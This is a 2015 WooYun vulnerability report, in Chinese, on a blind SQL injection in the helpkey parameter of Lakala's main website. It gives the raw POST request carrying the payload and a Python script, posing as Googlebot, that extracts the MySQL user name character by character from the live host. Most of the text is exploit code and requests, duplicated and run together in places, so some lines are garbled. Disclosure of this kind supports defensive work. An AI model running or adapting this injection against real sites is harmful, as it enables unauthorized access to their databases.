拉卡拉主站MySQL注射(root,附验证脚本)

发表于 2015年07月23日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0128778

漏洞标题：拉卡拉主站MySQL注射(root,附验证脚本)

相关厂商：拉卡拉网络技术有限公司

漏洞作者：路人甲

提交时间：2015-07-23 20:32

公开时间：2015-09-11 07:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

Tags标签：

漏洞详情

披露状态：

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认，细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述：

拉卡拉主站MySQL注射(root,附验证脚本)

详细说明：

注射点：

POST /index.php?a=clckRelationHelp HTTP/1.1<br>
Content-Length: 177<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Requested-With: XMLHttpRequest<br>
Referer: http://www.lakala.com<br>
Cookie: PHPSESSID=0da719011942902fb844cd2bd1f40efb<br>
Host: www.lakala.com<br>
Connection: Keep-alive<br>
Accept-Encoding: gzip,deflate<br>
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4<br>
Accept: */*helpkey=%' and length(user())=16 and '%'='&lid=0&pageindex=1&pagesize=5&sid=0

POST /index.php?a=clckRelationHelp HTTP/1.1

Content-Length: 177

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.lakala.com

Cookie: PHPSESSID=0da719011942902fb844cd2bd1f40efb

Host: www.lakala.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4

Accept: */*helpkey=%' and length(user())=16 and '%'='&lid=0&pageindex=1&pagesize=5&sid=0

参数helpkey和key可注入。

漏洞证明：

猜解user():

[Done] MySQL user is [email protected]

1	[Done] MySQL user is [email protected]

#encoding=utf-8<br>
import httplib<br>
import time<br>
import string<br>
import sys<br>
import random<br>
import urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',<br>
           'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())<br>
user = ''for i in range(1, 17):<br>
    for payload in payloads:<br>
        s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))<br>
        s = "helpkey=%%' and %s and '%%'='&lid=0&pageindex=1&pagesize=5&sid=0" % s<br>
        conn = httplib.HTTPConnection('www.lakala.com', timeout=30)<br>
        conn.request(method='POST', url='/index.php?a=clckRelationHelp', body=s, headers=headers)<br>
        html_doc = conn.getresponse().read()<br>
        conn.close()<br>
        print '.',<br>
        if html_doc.find('RecordCount:0') < 0:<br>
            user += payload<br>
            print '\n[in progress]', user,<br>
            breakprint '\n[Done] MySQL user is %s' % user

#encoding=utf-8

import httplib

import time

import string

import sys

import random

import urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',

'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())